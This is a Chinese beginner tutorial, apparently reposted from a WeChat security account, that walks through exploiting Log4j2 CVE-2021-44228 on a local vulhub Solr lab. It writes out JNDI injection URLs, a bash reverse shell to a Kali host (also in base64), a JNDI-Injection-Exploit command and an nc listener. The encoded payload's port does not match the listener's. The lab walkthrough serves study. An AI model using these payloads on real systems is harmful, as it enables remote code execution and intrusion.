log4j2(CVE-2021-44228)漏洞复现实操(小白向)

admin 2022年5月13日01:36:49评论98 views字数 1478阅读4分55秒阅读模式

这篇文章发的晚了点哈,之前一直没有复现过,有什么地方不懂可以文章末尾留言。关于靶场搭建的可以百度vulhub靶场搭建,建议Ubuntu搭建。

前言:

Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。

2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议rmi:和ldap:是不安全的或者可以允许远程代码执行。

受影响版本:

Apache Log4j 2.x <= 2.14.1

 

正文:

环境搭建:

依托vulhub靶场搭建环境,漏洞启动目录:

/vulhub-master/log4j/CVE-2021-44228

启动命令:

docker-compose up -d

启动成功后访问地址:http://192.168.0.110:8983/solr/#/

IP换成你自己的靶机IP即可

搭建效果:

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

漏洞复现:

首先我们需要准备一台kali

工具用到的是大佬开发的exp

https://github.com/bkfish/Apache-Log4j-Learning/

这里我们直接下载到kali中也可以,工具具体目录在文件中的tools目录下

我们直接开始演示

先利用dnslog生成一个用于接收回参的网址(这个工具的作用就是在不知道或者无法查看回显时候利用第三方的平台查看回显,看看自己的命令是否被执行。)

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

然后我们对目标网站进行测试,访问网址:

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:ldap://4wuy7v.dnslog.cn}

同样是换成你自己的IP和生成的dnslog值即可

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

我们等十秒点击第一个箭头处的刷新就可以看到回显,ok这里可以利用

我们继续下一步,进行nc的反弹shell

首先到kali中打开我们事先准备好的exp

解压后到tools目录下

构造payload:

bash -i >& /dev/tcp/192.168.0.106/6969 0>&1

这里IP是kali的IP,端口是你等会nc监听的端口

然后我们将这个加密为base64

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

直接使用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA2LzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.106

这里红色处就是你加密之后的值,最后面的IP还是kali的IP,回车启动

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

这里会生成两个协议各一个执行命令,这两个协议在log4j2中都有执行权限

我们使用第一个,再次构造一个payload

${jndi:rmi://192.168.0.106:1099/sm0syp}

kali中开启nc

nc -lvvp 6969

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

然后我们将这个payload插入到action的后面

http://192.168.0.110:8983/solr/admin/cores?action=${jndi:rmi://192.168.0.106:1099/sm0syp}

回车直接访问

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

再次回到kali中我们可以看到nc成功反弹shell

log4j2(CVE-2021-44228)漏洞复现实操(小白向)

交流群:70844080

公众号:白安全组

作者:【白】



原文始发于微信公众号(白安全组):log4j2(CVE-2021-44228)漏洞复现实操(小白向)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月13日01:36:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   log4j2(CVE-2021-44228)漏洞复现实操(小白向)http://cn-sec.com/archives/1002678.html

发表评论

匿名网友 填写信息